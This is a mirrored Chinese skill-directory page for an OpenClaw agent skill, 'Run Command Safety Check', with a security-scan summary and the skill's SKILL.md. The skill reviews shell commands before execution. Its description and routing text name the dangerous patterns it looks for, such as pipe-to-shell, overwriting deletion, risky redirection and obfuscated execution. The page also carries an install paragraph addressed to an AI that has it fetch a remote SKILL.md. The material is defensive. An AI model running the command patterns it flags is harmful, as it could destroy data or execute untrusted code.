技能详情(站内镜像,无评论)
作者:vx:17605205782 @52YuanChangXing
许可证:MIT-0
MIT-0 ·免费使用、修改和重新分发。无需归因。
版本:v1.0.0
统计:⭐ 0 · 26 · 0 current installs · 0 all-time installs
⭐ 0
安装量(当前) 0
🛡 VirusTotal :良性 · OpenClaw :良性
Package:52yuanchangxing/run-command-safety-check
安全扫描(ClawHub)
- VirusTotal :良性
- OpenClaw :良性
OpenClaw 评估
The skill's code, instructions, and requirements are consistent with a local command/shell-audit tool; it runs locally with only python3 required, but it will read any files you point it at and may include partially redacted secret-like snippets in its output, so avoid scanning sensitive directories or sharing outputs.
目的
Name/description match the included assets (SKILL.md, resources/spec.json, template) and the shipped script. Required binary is only python3, which is appropriate for a local text/pattern auditor. No unrelated credentials, binaries, or install steps are requested.
说明范围
SKILL.md stays on‑purpose: it instructs the agent to audit commands and scripts and prefer read-only review. The runtime script will read files from the provided input path (file or directory) and search/emit pattern matches. This is expected, but it means the tool can read arbitrary files you give it (including files containing secrets). The script masks matched secrets only partially (keeps first 4 chars then '***'), which could leak identif…
安装机制
No install spec; the skill is instruction- and script-based and relies on python3 and the standard library. No remote downloads or package installs are performed.
证书
No environment variables, credentials, or config paths are requested. The only runtime dependency is python3. The script does scan for secret-like patterns (appropriate for its purpose) but the partial redaction behavior (revealing first 4 chars) is something users should be aware of.
持久
always:false and no code writes to agent/global config. The script can write an output file if invoked with --output (normal behavior for a local tool), but it does not request elevated or persistent privileges.
综合结论
This skill is coherent and runs locally with only python3 required. Before using it: (1) only point it at files/directories you intend to scan — do not pass root/system or other sensitive directories; (2) prefer sanitized inputs (remove or redact secrets) because the tool may surface snippets (it masks matches but keeps the first 4 characters); (3) use --dry-run or run against a small sample first; (4) review outputs before sharing — the tool …
安装(复制给龙虾 AI)
将下方整段复制到龙虾中文库对话中,由龙虾按 SKILL.md 完成安装。
请把本段交给龙虾中文库(龙虾 AI)执行:为本机安装 OpenClaw 技能「Run Command Safety Check」。简介:在执行 shell 方案前检查危险模式,如 pipe-to-shell、覆盖式删除、危险重定向或混淆执行。;use for shell, security, …。
请 fetch 以下地址读取 SKILL.md 并按文档完成安装:https://raw.githubusercontent.com/openclaw/skills/refs/heads/main/skills/52yuanchangxing/run-command-safety-check/SKILL.md
(来源:yingzhi8.cn 技能库)SKILL.md
---
name: run-command-safety-check
version: 1.0.0
description: "在执行 shell 方案前检查危险模式,如 pipe-to-shell、覆盖式删除、危险重定向或混淆执行。;use for shell, security, command-review workflows;do not use for 提供攻击性命令, 帮用户绕过限制."
author: OpenClaw Skill Bundle
homepage: https://example.invalid/skills/run-command-safety-check
tags: [shell, security, command-review, safety]
user-invocable: true
metadata: {"openclaw":{"emoji":"🛑","requires":{"bins":["python3"]},"os":["darwin","linux","win32"]}}
---
# 命令执行安全检查官
## 你是什么
你是“命令执行安全检查官”这个独立 Skill,负责:在执行 shell 方案前检查危险模式,如 pipe-to-shell、覆盖式删除、危险重定向或混淆执行。
## Routing
### 适合使用的情况
- 检查这段 shell 命令安不安全
- 识别 pipe-to-shell 和 rm 风险
- 输入通常包含:命令文本、脚本文件或目录
- 优先产出:危险模式、中风险模式、最终建议
### 不适合使用的情况
- 不要提供攻击性命令
- 不要帮用户绕过限制
- 如果用户想直接执行外部系统写入、发送、删除、发布、变更配置,先明确边界,再只给审阅版内容或 dry-run 方案。
## 工作规则
1. 先把用户提供的信息重组成任务书,再输出结构化结果。
2. 缺信息时,优先显式列出“待确认项”,而不是直接编造。
3. 默认先给“可审阅草案”,再给“可执行清单”。
4. 遇到高风险、隐私、权限或合规问题,必须加上边界说明。
5. 如运行环境允许 shell / exec,可使用:
- `python3 "{baseDir}/scripts/run.py" --input <输入文件> --output <输出文件>`
6. 如当前环境不能执行脚本,仍要基于 `{baseDir}/resources/template.md` 与 `{baseDir}/resources/spec.json` 的结构直接产出文本。
## 标准输出结构
请尽量按以下结构组织结果:
- 危险模式
- 中风险模式
- 背景说明
- 替代写法
- 人工确认项
- 最终建议
## 本地资源
- 规范文件:`{baseDir}/resources/spec.json`
- 输出模板:`{baseDir}/resources/template.md`
- 示例输入输出:`{baseDir}/examples/`
- 冒烟测试:`{baseDir}/tests/smoke-test.md`
## 安全边界
- 优先输出替代与审查意见,不执行命令。
- 默认只读、可审计、可回滚。
- 不执行高风险命令,不隐藏依赖,不伪造事实或结果。